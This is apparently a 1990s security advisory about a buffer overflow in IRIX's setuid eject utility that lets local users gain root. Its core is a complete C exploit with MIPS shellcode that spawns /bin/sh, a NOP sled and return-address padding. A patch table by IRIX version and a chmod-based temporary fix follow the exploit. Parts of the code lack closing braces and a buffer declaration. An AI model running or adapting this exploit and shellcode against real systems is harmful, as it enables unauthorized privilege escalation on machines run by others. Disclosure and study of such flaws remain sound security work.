

    IRIX 6.2 (maybe 6.1 and 6.0.1 - not tested)


    eject(1) is  a program  used to  eject a  removable media  device,
    such  as  floppy,  CDROM,  or  tape.  If  the  floppy  or CDROM is
    mounted, eject will first try to unmount it.

    David Hedley  found following.   It is  buffer overflow  in eject.
    Local users  can gain  root privileges   This was  tested on Power
    Challenge (R8000) Irix64 6.2.

    /* /usr/sbin/eject exploit by DCRH 25/5/97
     * Tested on: R8000 Power Challenge (Irix64 6.2)
     * Exploit doesn't work on Irix 5.x due to stack position
     * Irix 6.3 does not appear to be vulnerable
     * compile as: cc -n32 eject.c

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define NUM_ADDRESSES   80
    #define BUF_LENGTH      400
    #define EXTRA           200
    #define OFFSET          -0x128
    #define GP_OFFSET       32412
    #define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

    #define u_long unsigned

    u_long get_sp_code[] = {
        0x03a01025,         /* move $v0,$sp         */
        0x03e00008,         /* jr $ra               */
        0x00000000,         /* nop                  */

    u_long irix_shellcode[] = {
        0x24041234,         /* li $4,0x1234         */
        0x2084edcc,         /* sub $4,0x1234        */
        0x0491fffe,         /* bgezal $4,pc-4       */
        0x03bd302a,         /* sgt $6,$sp,$sp       */
        0x23e4012c,         /* addi $4,$31,264+36   */
        0xa086feff,         /* sb $6,-264+7($4)     */
        0x2084fef8,         /* sub $4,264           */
        0x20850110,         /* addi $5,$4,264+8     */
        0xaca4fef8,         /* sw $4,-264($5)       */
        0xaca6fefc,         /* sw $4,-260($5)       */
        0x20a5fef8,         /* sub $5, 264          */
        0x240203f3,         /* li $v0,1011          */
        0x03ffffcc,         /* syscall 0xfffff      */
        0x2f62696e,         /* "/bin"               */
        0x2f7368ff,         /* "/sh"                */


    void main(int argc, char **argv)
        char *env[] = {NULL};
        u_long targ_addr, stack;
        u_long *long_p;
        int i, code_length = strlen((char *)irix_shellcode)+1;
        u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

        stack = get_sp();

        if (stack & 0x80000000) {
            printf("Recompile with the '-n32' option\n");

        long_p =(u_long *)  buf;
        targ_addr = stack + OFFSET;

        if (argc > 1)
          targ_addr += atoi(argv[1]) * 4;

        if (targ_addr + GP_OFFSET > 0x80000000) {
            printf("Sorry - this exploit for Irix 6.x only\n");

        while ((targ_addr & 0xff000000) == 0 ||
               (targ_addr & 0x00ff0000) == 0 ||
               (targ_addr & 0x0000ff00) == 0 ||
               (targ_addr & 0x000000ff) == 0)
          targ_addr += 4;

        for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
            *long_p++ = targ_addr + NUM_ADDRESSES/2;

        for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
            *long_p++ = IRIX_NOP;

        for (i = 0; i < code_length/sizeof(u_long); i++)
            *long_p++ = irix_shellcode[i];

        for (i = 0; i < EXTRA / sizeof(u_long); i++)
            *long_p++ = targ_addr + GP_OFFSET;

        *long_p = 0;

        printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

        execle("/usr/sbin/eject", "eject", buf, 0, env);
        perror("execl failed");


    Patches are:

        OS Version     Vulnerable?     Patch #      Other Actions
        ----------     -----------     -------      -------------
        IRIX 3.x          unknown      not avail    Note 1
        IRIX 4.x          unknown      not avail    Note 1
        IRIX 5.0.x        yes          not avail    Note 1
        IRIX 5.1.x        yes          not avail    Note 1
        IRIX 5.2          yes          not avail    Note 1
        IRIX 5.3          yes          2228
        IRIX 6.0.x        yes          not avail    Note 1
        IRIX 6.1          yes          not avail    Note 1
        IRIX 6.2          yes          2177
        IRIX 6.3          yes          2232
        IRIX 6.4          yes          2233

    Temporary fix:

        chmod u-s /usr/sbin/eject